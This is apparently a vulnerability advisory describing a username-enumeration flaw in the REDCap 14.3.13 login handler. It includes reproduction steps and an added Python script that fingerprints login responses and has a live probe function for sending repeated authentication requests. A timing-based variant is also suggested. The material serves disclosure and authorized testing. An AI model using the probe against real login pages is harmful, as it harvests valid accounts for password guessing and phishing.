REDCap
cpe:2.3:a:project-redcap:redcap:*:*:*:*:*:*:*
- 14.3.13
A user enumeration vulnerability exists in REDCap version 14.3.13. The login handler returns a different error message depending on whether the submitted username exists, so an attacker who sends repeated HTTP authentication requests with a fixed incorrect password and varying usernames can tell which names are valid and then concentrate brute-force attempts on those accounts. A mechanism intended to protect against this type of attack is present, but its behaviour itself allows the enumeration rather than preventing it.
Exploitation discloses valid usernames to an unauthenticated attacker, which facilitates follow-on attacks such as password guessing against the confirmed accounts or targeted phishing of their owners.
To reproduce the vulnerability, send authentication requests to the REDCap login page with a constant wrong password and a list of candidate usernames, then compare the responses: a valid username produces a different error message from an invalid one. Comparing each response against the one returned for a username known not to exist identifies the existing accounts systematically.
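The following script is an added example of the response-comparison technique described above; it is not code from the REDCap project or from the original advisory. The login URL, the form field names `username` and `password`, and the sample response texts are constructed placeholders, not REDCap's actual strings: the point is that two response classes appear for the same wrong password, not the specific wording. It also masks digits before comparing, so a per-account counter (such as a remaining-attempts lockout message) cannot hide the oracle by making every response unique.

```python
"""Detect a username-enumeration oracle by comparing login responses.

Added example, not code from REDCap or the advisory. It assumes a login
endpoint that answers with one error text for unknown usernames and another
for known usernames with a wrong password. URL, form field names and the
sample bodies below are constructed placeholders.
"""
from collections import defaultdict
import hashlib
import re
import urllib.error
import urllib.parse
import urllib.request

# Constructed placeholder responses standing in for a vulnerable login page.
# The wording is invented for this example; the real application's strings
# differ. Only the *difference* between the two classes matters.
SAMPLE_RESPONSES = {
    "alice":     (401, "<p>Incorrect password. 4 attempts remaining.</p>"),
    "bob":       (401, "<p>Incorrect password. 3 attempts remaining.</p>"),
    "mallory":   (401, "<p>User not found.</p>"),
    "zz_nobody": (401, "<p>User not found.</p>"),
    "carol":     (401, "<p>Incorrect password. 4 attempts remaining.</p>"),
}


def fingerprint(status, body):
    """Reduce a response to a comparable key.

    Digits are masked so that per-account counters (e.g. attempts remaining
    before lockout) do not split one message class into many; whitespace is
    collapsed so formatting noise is ignored.
    """
    text = re.sub(r"\d+", "#", body)
    text = re.sub(r"\s+", " ", text).strip()
    return (status, hashlib.sha256(text.encode()).hexdigest()[:16])


def classify(responses):
    """Group usernames by response fingerprint.

    More than one group for the same wrong password means the server leaks
    whether a username exists. Returns fingerprint -> sorted usernames.
    """
    groups = defaultdict(list)
    for user, (status, body) in responses.items():
        groups[fingerprint(status, body)].append(user)
    return {k: sorted(v) for k, v in groups.items()}


def enumeration_oracle(responses, known_invalid):
    """Return usernames whose response differs from a name that cannot exist.

    `known_invalid` should be a random string that is certainly not an
    account; every username that does not share its fingerprint is reported
    as likely valid.
    """
    baseline = fingerprint(*responses[known_invalid])
    return sorted(u for u, r in responses.items() if fingerprint(*r) != baseline)


def probe(login_url, usernames, password="wrong-password-for-enumeration"):
    """Collect live responses (not executed here; requires authorization).

    The field names are assumptions; adjust them to the target's login form.
    The password stays constant so the username is the only variable.
    """
    results = {}
    for user in usernames:
        data = urllib.parse.urlencode({"username": user, "password": password}).encode()
        req = urllib.request.Request(login_url, data=data, method="POST")
        try:
            with urllib.request.urlopen(req, timeout=10) as resp:
                results[user] = (resp.status, resp.read().decode(errors="replace"))
        except urllib.error.HTTPError as e:
            results[user] = (e.code, e.read().decode(errors="replace"))
    return results


if __name__ == "__main__":
    for fp, users in classify(SAMPLE_RESPONSES).items():
        print(fp, users)
    print("likely valid:", enumeration_oracle(SAMPLE_RESPONSES, "zz_nobody"))
```

Run it as-is against the constructed data to see the two response classes; to test a live instance you are authorized to assess, feed `probe()` a short candidate list plus one deliberately random name and pass its output to `enumeration_oracle()`. If the status codes and bodies are identical, also compare response times, since a timing difference between the "user exists" and "user does not exist" paths is a second, quieter oracle that this body-only comparison does not catch.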